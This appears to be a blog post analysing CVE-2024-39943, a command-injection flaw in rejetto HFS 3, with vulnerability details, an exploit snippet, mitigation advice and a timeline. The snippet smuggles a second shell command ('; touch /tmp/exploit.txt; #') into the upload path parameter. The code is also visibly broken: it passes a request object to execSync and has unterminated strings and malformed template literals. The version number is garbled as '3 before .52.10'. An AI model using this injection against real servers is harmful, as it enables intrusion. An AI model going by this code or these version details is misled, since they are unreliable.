CVE-2024-39943 – Remote Authenticated OS Command Execution in rejetto HFS (HTTP File Server) 3 before .52.10

A recently discovered vulnerability in rejetto HFS (HTTP File Server) 3 before .52.10 allows remote authenticated users (with upload permissions) the ability to execute arbitrary OS commands. This vulnerability specifically affects Linux, UNIX, and macOS systems, and has been assigned the CVE identifier CVE-2024-39943. This blog post will provide an in-depth analysis of the vulnerability, including a code snippet demonstrating the exploit, links to original references, and a description of the specific exploit details.

Vulnerability Details

The vulnerability (CVE-2024-39943) arises from the use of a shell to execute the "df" command within rejetto HFS. More specifically, rejetto HFS uses the "execSync" function instead of the more secure "spawnSync" function when calling Node.js's "child_process" module. This results in OS command execution by remote authenticated users, assuming they have the necessary upload permissions.

Exploit Code Snippet

The following code snippet demonstrates how the exploit can be carried out by an attacker with a pre-existing authenticated session:

const { execSync } = require('child_process');

const authToken = 'your-auth-token';
const targetUrl = 'http://target.url';;

const payload = "; touch /tmp/exploit.txt; #;

const requestOptions = {
  url: ${targetUrl}/?mode=upload&path=${encodeURIComponent(payload)},
  headers: {
    'Authorization': Basic ${authToken}
  }
};

execSync(requestOptions, (error, stdout, stderr) => {
  if (error) {
    console.error(An error occurred during exploit execution: ${error});
    return;
  }

  console.log(Exploit executed successfully. File created at /tmp/exploit.txt);
});

Original References

1. NVD - CVE-2024-39943
2. Rejetto HFS GitHub Repository
3. Node.js Child Process Documentation

Mitigation

To mitigate this vulnerability, the developers of rejetto HFS have released version .52.10. Users running previous versions are advised to upgrade to the latest release immediately. Additionally, users should restrict upload permissions to only trusted users and consider using alternative methods for file uploads that do not use a shell for execution.

Conclusion

CVE-2024-39943 is a serious security vulnerability that affects rejetto HFS (HTTP File Server) 3 before .52.10. By allowing remote authenticated users with upload permissions to execute arbitrary OS commands, malicious actors can create potentially damaging security breaches within affected systems. Ensuring that your system is updated to the latest release and carefully managing user permissions is essential to protecting against this exploit.

It is always recommended to stay up-to-date with the latest security patches and use caution in granting permissions to untrusted users, as well as regularly monitoring your system for signs of suspicious activity.

Timeline

Published on: 07/04/2024 23:15:09 UTC
Last modified on: 07/08/2024 16:42:25 UTC